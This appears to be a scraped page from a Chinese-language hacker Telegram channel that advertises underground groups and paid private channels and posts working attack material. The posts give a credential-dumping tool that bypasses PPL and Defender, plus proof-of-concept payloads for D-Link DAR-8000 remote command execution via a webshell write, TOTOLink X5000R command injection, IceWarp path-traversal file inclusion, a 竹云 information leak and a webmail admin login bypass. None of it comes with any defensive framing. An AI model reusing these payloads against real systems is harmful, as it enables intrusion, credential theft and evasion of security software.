黑客自由城 优质内容共享
Open in Telegram
telegram最大的黑客交流社区 @Hacker_CityN (核心技术) @Hacker_CityM (核心发布) @DARKWEBEN (担保主群) @DARKWEB_EN2 (渗透推文) @hackerspike (资源交流) @spike_hacker (资源分享) @kaliLinux666 (收款存根) @Hacker_CityL (业务对接) 私有频道联系管理员付费加入
Show moreThe country is not specifiedTechnologies & Applications33 626
2 390
Subscribers
-124 hours
-17 days
+330 days
Posts Archive
2 390
绕过 PPL,能 bypass WD。
主要功能:
1 绕过PPL保护
2 混淆内存转储文件以逃避 Defender 基于签名的检测机制
3 使用 RAW 和 SMB 上传方法上传内存转储,而不将其放到磁盘上(无文件转储
https://github.com/tastypepperoni/PPLBlade
2 390
D-LINK-DAR-8000-10 远程命令执行 poc
https://xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiMjAzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC9tb2R1bGUuY2xhc3MucGhwJw==
3.直接访问shell
https://xxx.xxx.xxx/app/module.class.php?cmd=phpinfo();
2 390
TOTOLink X5000R 远程命令执行 附POC
POST /cgi-bin/cstecgi.cgi HTTP/1.1
{"command":"\r\n pwd > /web/gxh_hrp.txt \r\n","num":"2","topicurl":"setTracerouteCfg"}
2 390
CVE-2023-39699:爱思华宝邮件服务器 本地文件包含漏洞 poc
https://xxx.xxx.xxx/webmail/calendar/minimizer/index.php?style={path_file}
..\..\..\..\..\..\..\..%2fwindows%2fwindowsupdate%2elog
..\..\..\..\..\..\..\..%2fwindows%2fsystem32%2flogfiles%2fhttperr%2fhttperrl%2elog
2 390
竹云 信息泄露 POC
POST /admin-api/oauth/../admin/user/findlist
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close
{"pagesize":改个数,"pageNumber":改个数,"userName":""}
2 390
WEBMAIL任意用户登录漏洞
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显是下面这个
"errorMsg":"64d880ce7b737912ccb1"
使用回显的 errormsg 作为密码,用户名为 admin 即可登录
使用手机验证码登录的打不了
显示 IP 受限的话添加头 X-Forwarded-For: 127.0.0.1 即可
如果有回显但登录失败的话,使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 然后在登录就行了
